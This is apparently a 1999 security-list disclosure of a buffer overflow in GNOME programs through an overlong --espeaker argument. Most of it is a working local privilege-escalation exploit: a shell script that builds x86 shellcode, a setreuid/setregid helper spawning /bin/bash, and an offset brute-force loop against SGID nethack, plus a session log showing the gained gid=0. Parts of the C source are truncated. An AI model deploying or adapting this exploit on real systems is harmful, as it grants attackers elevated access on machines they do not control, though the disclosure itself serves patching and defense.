Greetings, Virtually any program using the GNOME libraries is vulnerable to a buffer overflow attack. The attack comes in the form: /path/to/gnome/prog --enable-sound --espeaker=$80bytebuffer The following exploit should work against any GNOME program, though I tried it on (the irony) /usr/games/nethack, which is SGID root by default on RH6.0. An attack on any program will look something like this: [xnec@redhack gnox]$ uname -a; cat /etc/redhat-release; id Linux redhack 2.2.9-19mdk #1 Wed May 19 19:53:00 GMT 1999 i686 unknown Linux Mandrake release 6.0 (Venus) uid=501(xnec) gid=501(xnec) groups=501(xnec) [xnec@redhack gnox]$ ./gnox.sh Building /tmp/gnox.c... ...done! Building /tmp/gn.c... ...done! Compiling /tmp/gnox... ...done! Compiling /tmp/gn... ...done! Launching attack... ... pages and pages of segfaults Generic GNOME exploit for Linux x86 Brock Tellier btellier@webley.com Using addr: 0xbffff988 buflen:90 offset:208 Can't resolve host name "ë^1AFF ° óV I1UØ@IèÜÿÿÿ/tmp/gnùÿ¿ùÿ¿Xúÿ¿Z"! before: uid=501, euid=501, gid=501, egid=0 after: uid=501, euid=501, gid=0, egid=0 [xnec@redhack gnomehack]$ id uid=501(xnec) gid=0(root) groups=501(xnec) Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com --- gnox.sh --- #!/bin/bash # Generic exploit for GNOME apps under Linux x86 # Our overflowed buffer is just 80 bytes so we'll have to get our settings # just so. Hence the shell script. # # This should work against any su/gid GNOME program. The only one that comes # with RH6.0 that is su/gid root is (the irony is killing me) nethack. # # Change the /usr/games/nethack statement in the while loop below to exploit # a different program. # # -Brock Tellier btellier@webley.com echo "Building /tmp/gnox.c..." cat > /tmp/gnox.c < #include char gnoshell[]= /* Generic Linux x86 shellcode modified to run our program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/gn"; #define LEN 120 #define BUFLEN 90 /* no need to change this */ #define NOP 0x90 #define DEFAULT_OFFSET 300 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char *argv[]) { int offset, i; int buflen = BUFLEN; long int addr; char buf[BUFLEN]; char gnobuf[LEN]; if(argc > 2) { fprintf(stderr, "Error: Usage: %s \n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else { offset=DEFAULT_OFFSET; } addr=get_sp(); fprintf(stderr, "Generic GNOME exploit for Linux x86\n"); fprintf(stderr, "Brock Tellier btellier@webley.com\n\n"); fprintf(stderr, "Using addr: 0x%x buflen:%d offset:%d\n", addr-offset, buflen, offset); memset(buf,NOP,buflen); memcpy(buf+35,gnoshell,strlen(gnoshell)); for(i=35+strlen(gnoshell);i /tmp/gn.c < void main() { printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid()); setreuid(geteuid(), geteuid()); setregid(getegid(), getegid()); printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(), geteuid(), getgid(), getegid()); system("/bin/bash"); } EOF echo "...done!" echo "Compiling /tmp/gnox..." gcc -o /tmp/gnox /tmp/gnox.c echo "...done!" echo "Compiling /tmp/gn..." gcc -o /tmp/gn /tmp/gn.c echo "...done!" echo "Launching attack..." offset=0 while [ $offset -lt 10000 ]; do /usr/games/nethack `/tmp/gnox $offset` offset=`expr $offset + 4` done echo "...done!" ------